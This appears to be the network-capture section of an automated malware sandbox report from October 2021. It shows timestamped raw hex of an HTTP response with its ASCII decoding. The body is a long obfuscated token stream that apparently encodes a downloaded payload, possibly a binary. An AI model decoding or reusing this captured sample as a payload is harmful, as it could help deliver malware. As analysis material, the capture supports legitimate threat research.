                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8yZOTH0gQL%2BWaMpIQXlHbop7GvcsREOLaOUDiUrNxrD7EzJvzUlAsSCG6w%2BK8jZzXpFu0QNaAm%2B3yd57cK5QFdWsbr%2B6cuieuiVsJLWC8XGQ2VvoIXs4%2Faut7sSMaSxW4grrDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            2021-10-29 18:11:00 UTC2654INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                            2021-10-29 18:11:00 UTC2654INData Raw: 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 51 6b 20 78 20 59 78 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 59 4f 20 78 20 74 6b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 6f 20 78 20 6b 74 20 78 20
                                                            Data Ascii: x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x RR x OoO x Qk x Yx x tk x Oxk x QQ x YO x tk x kk x RY x RY x RY x Kk x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kE x tO x tx x OOt x Qx x tO x Oox x Oxk x RY x RR x kO x Rk x kY x Yx x kR x Kk x ko x kt x
                                                            2021-10-29 18:11:00 UTC2655INData Raw: 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 59 45 20 78 20 52 59 20 78 20 74 59 20 78 20 52 51 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 6f 20 78 20 51 51 20 78 20 4b 6b 20 78 20 74 78 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 59 45 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 74 78 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 74 20 78 20 4f 78 45 20 78 20 74
                                                            Data Ascii: x tk x Ooo x kK x kt x kR x OOR x Qk x YO x tK x YE x RY x tY x RQ x RR x ko x Yx x kR x Kk x kY x to x tK x OOk x kQ x Yx x kR x Ooo x QQ x Kk x tx x OxQ x Qx x OxQ x Oxk x OOt x Qt x kk x ko x YE x kK x kt x tx x Ooo x Qt x OOQ x RY x RY x tt x OxE x t
                                                            2021-10-29 18:11:00 UTC2657INData Raw: 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 52 59 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 59 45 20 78 20 51 51 20 78 20 74 4f 20 78 20 6b 52 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 78 20 78 20 6b 59 20 78 20 52 6b 20
                                                            Data Ascii: x RR x ko x Yx x kR x Kk x kK x kt x Yt x Oxt x Oxx x kt x Oox x Oxk x kE x tO x tx x OOt x Qx x tO x Oox x Oxk x kR x OOQ x RY x RY x kR x RY x tx x to x Qx x kk x ko x RQ x QQ x OxQ x Oxk x Yx x Qx x kR x ko x YE x QQ x tO x kR x kk x RY x tx x kY x Rk
                                                            2021-10-29 18:11:00 UTC2658INData Raw: 78 6b 20 78 20 6b 4b 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 51 78 20 78 20 6b 52 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 74 20 78 20 6b 4b 20 78 20 74 4f 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 51 74 20 78 20 4b 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 51 51 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 78 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 6b 6f 20 78 20 4f 4f 78 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 4f 78 51
                                                            Data Ascii: xk x kK x OxQ x tx x OOR x Qx x kR x QQ x RY x RY x tO x kY x Rt x kK x tO x Yt x OxR x Qt x KQ x tK x Oxk x QQ x Yx x Yt x KQ x QQ x OxQ x tk x Oxk x RY x RY x RR x QQ x RY x Oxt x Oox x OOk x kQ x Yx x tx x OOY x ko x OOx x tK x Oxk x Qx x kO x Rk x OxQ
                                                            2021-10-29 18:11:00 UTC2659INData Raw: 78 78 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 4f 6f 4f 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 51 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 6b 4b 20 78 20 4f 78 78 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 6b 6b 20 78
                                                            Data Ascii: xx x to x tK x OOo x Qk x OxQ x Oxx x kk x RY x RY x Rt x OOE x RY x KQ x Oxx x OoO x Qt x kk x ko x Oxk x kY x to x tK x OOo x Oxx x OxQ x tx x Kk x Qx x kR x RR x OoO x Qk x Yx x Qx x OOo x Qk x tO x kR x kK x Oxx x to x tK x OOo x Qk x OxQ x Oxx x kk x
                                                            2021-10-29 18:11:00 UTC2661INData Raw: 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4f 20 78 20 59 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 4f 4f 4f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 6f 6f
                                                            Data Ascii: Ooo x Qt x tO x Yt x Kk x RY x RY x RR x OOE x RY x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x tK x Oxk x Qk x kt x Yt x Kk x Qx x kR x ko x OOO x QQ x OxQ x kR x OxK x Qx x RY x RY x RY x OOE x RY x RR x tx x Qk x OOx x kR x OOR x kY x OxQ x kR x Ooo
                                                            2021-10-29 18:11:00 UTC2662INData Raw: 4f 78 78 20 78 20 52 51 20 78 20 74 6b 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 59 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 6f 6f 20 78 20 6b 4f 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 52 74 20 78 20 51 51 20
                                                            Data Ascii: Oxx x RQ x tk x KQ x QQ x OOx x tk x OOk x QQ x OxE x Rt x Yt x RY x kY x Oox x OOk x kQ x kt x ko x Rk x Oxx x kk x tK x Ooo x Qk x YO x tK x kk x RY x tx x OOY x RR x ko x Yx x kR x Kk x kY x YO x Oxk x Ooo x kO x Yx x Yt x OOY x Qk x YO x tK x Rt x QQ
                                                            2021-10-29 18:11:00 UTC2663INData Raw: 6b 59 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 51 78 20 78 20 6b 74 20 78 20 59 45 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 74 6b 20 78 20 59 45 20 78 20 51 51 20 78 20 59 4f 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 6b 59 20 78 20 4b 51 20 78 20 4f 78 6b 20 78 20 4f 78
                                                            Data Ascii: kY x tO x tx x OOo x Qk x OOx x kO x RY x RY x kx x YR x RY x ko x Yx x kR x Kk x kO x Yx x Oox x OOo x Qx x kt x YE x Kk x kY x OxQ x kR x OxR x Oxx x RY x RR x Oxx x RY x kY x Oxx x Oxk x Oxx x tx x tk x YE x QQ x YO x ko x Oxk x Qk x kY x KQ x Oxk x Ox
                                                            2021-10-29 18:11:00 UTC2665INData Raw: 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 4b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 51 78 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 78 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 52 20 78 20 6b 4f 20 78 20 52 52 20 78 20 52 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 59 4f 20 78 20 6b 6f 20 78 20 4f 4f
                                                            Data Ascii: x RR x tx x Qk x OxQ x ko x kO x kQ x kt x Oxk x OOt x Oxx x RY x RY x RY x Oxt x OOQ x tx x tK x Qk x OOx x Qx x OxK x Qk x tO x Oxk x Oxt x kQ x kk x ko x Oxk x kY x OxQ x kR x OxR x Oxx x RY x RY x RY x OOR x kO x RR x RQ x QQ x OxQ x tx x YO x ko x OO
                                                            2021-10-29 18:11:00 UTC2666INData Raw: 20 52 6b 20 78 20 74 45 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 6b 59 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4b 51 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 4f 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20
                                                            Data Ascii: Rk x tE x RR x ko x Yx x kR x Kk x kK x kt x kR x OOt x Oxx x kY x Oxk x Kk x Qx x kt x KQ x Rk x Qk x YO x kR x OOt x Oxx x RY x RY x RY x ko x kO x tx x to x Qx x kk x ko x kO x kQ x kk x tK x Oxk x Qk x OOx x kO x RY x Oox x RY x RR x tx x Qk x OxQ x
                                                            2021-10-29 18:11:00 UTC2667INData Raw: 78 20 4f 4f 6b 20 78 20 51 78 20 78 20 4b 51 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 51 74 20 78 20 6b 74 20 78 20 59 45 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 6b 74 20 78 20 6b 6f
                                                            Data Ascii: x OOk x Qx x KQ x RR x OxK x QQ x OxQ x tx x OOR x kR x OOQ x RY x RY x OoO x OOQ x RR x tx x Qk x OOx x kR x OOR x kO x Yx x OxK x OOo x Qk x tO x ko x kk x Qt x kt x YE x Oxt x Qk x YO x Oxx x Ooo x RY x RY x Rk x tt x RY x kY x Oox x OOk x kQ x kt x ko
                                                            2021-10-29 18:11:00 UTC2669INData Raw: 4f 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 78 20 78 20 6b 6b 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 52 6b 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 4b 20 78 20 74 74 20 78 20 4f 6f 4f 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 52 59 20 78 20 52
                                                            Data Ascii: O x to x ko x Rk x Qk x Yx x Oox x OOk x QQ x OxE x RY x RY x Qt x OOQ x tx x to x Qx x kk x ko x RQ x Qx x kk x Qx x OOo x kQ x Yx x kR x Rk x kQ x kk x RR x Ooo x RY x RQ x Oxx x RQ x kE x kK x tt x OoO x tR x OxQ x ko x OOY x Qk x RY x RY x tY x RY x R
                                                            2021-10-29 18:11:00 UTC2670INData Raw: 4f 20 78 20 59 74 20 78 20 6b 4b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 78 52 20 78 20 51 78 20 78 20 6b 59 20 78 20 4f 78 4b 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 51 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 6b 45 20 78 20 51 78 20 78 20 6b 74 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 51 78 20 78 20 6b
                                                            Data Ascii: O x Yt x kK x Qx x kt x Oox x OxQ x RY x RY x RY x KE x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kY x Yx x kR x OoO x Oxx x OxQ x Oxk x OxR x Qx x kY x OxK x OxK x Qk x OxQ x ko x OOY x Qx x kO x RY x RY x KQ x OOQ x tx x kE x Qx x kt x Oxx x RQ x Qx x k
                                                            2021-10-29 18:11:00 UTC2671INData Raw: 20 78 20 4f 4f 4f 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 4f 78 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 74 20 78 20 4f 4f 52 20 78 20 52 59 20
                                                            Data Ascii: x OOO x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx x kk x ko x Oxk x ko x kk x OxK x kk x RY x RY x OOY x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx x kk x ko x Oxk x kR x OOQ x Rt x OOR x RY
                                                            2021-10-29 18:11:00 UTC2673INData Raw: 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20
                                                            Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
                                                            2021-10-29 18:11:00 UTC2674INData Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4b 51 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                            Data Ascii: RY x RY x RY x RY x RQ x RY x RY x RY x RY x kY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x to x OxE x RY x RY x RY x Rt x KQ x RR x RY x RY x RY x RY x RY x RY x RY x RY x
                                                            2021-10-29 18:11:00 UTC2675INData Raw: 78 6f 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 74 45 20 78 20 6b 6b 20 78 20 6b 45 20 78 20 4f 78 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 4f 45 20 78 20 59 4b 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 6b 78 20 78 20 4f 4f 6b 20 78 20 59 45 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4f 6f 78 20 78 20 4b 74 20 78 20 6b 78 20 78 20 74 52 20 78 20 4f 78 4b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 4f 74 20 78 20 74 52 20 78 20 52 74 20 78 20 4f 78 4b 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 6f 4f 20 78 20 59 45 20 78 20 4f 4f 4b 20 78 20 59 4b 20 78 20 74 51 20 78 20 4f 4f 6f 20 78 20 4f 4f 74 20 78 20 4f 4f 4b 20 78 20 4f 4f 74 20 78 20
                                                            Data Ascii: xo x OOK x OxO x Oox x tE x kk x kE x Oxk x OOO x OxY x kK x Oxt x OOE x YK x OOO x YO x OOk x kx x OOk x YE x KE x OOk x Oox x Kt x kx x tR x OxK x OOR x tR x Kt x KQ x OOt x tR x Rt x OxK x OOO x OOK x OoO x YE x OOK x YK x tQ x OOo x OOt x OOK x OOt x
                                                            2021-10-29 18:11:00 UTC2677INData Raw: 78 20 74 4b 20 78 20 74 51 20 78 20 6b 45 20 78 20 4f 4f 4b 20 78 20 4f 4f 45 20 78 20 4f 78 52 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 59 4b 20 78 20 4b 74 20 78 20 74 6f 20 78 20 59 52 20 78 20 59 52 20 78 20 4f 4f 74 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 74 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 74 4f 20 78 20 4f 78 59 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 4f 4f 6b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4f 78 51 20 78 20 59 4b 20 78 20 4f 4f 74 20 78 20 59 59 20 78 20 4f 78 59 20 78 20 4b 51 20 78 20 4f 4f 6f 20 78 20 74 74 20 78 20 4f 4f 78 20 78 20 4f 4f 6b 20 78 20 59 52 20 78 20 59 4b 20 78 20 52 6b 20 78 20 6b 4f 20 78
                                                            Data Ascii: x tK x tQ x kE x OOK x OOE x OxR x OxO x YR x KE x Kt x OOx x YK x Kt x to x YR x YR x OOt x tO x Kk x OOk x Kt x kt x Yo x OOY x tY x tO x OxY x OOk x tR x OxQ x OOk x OOO x YK x OxQ x YK x OOt x YY x OxY x KQ x OOo x tt x OOx x OOk x YR x YK x Rk x kO x
                                                            2021-10-29 18:11:00 UTC2678INData Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52
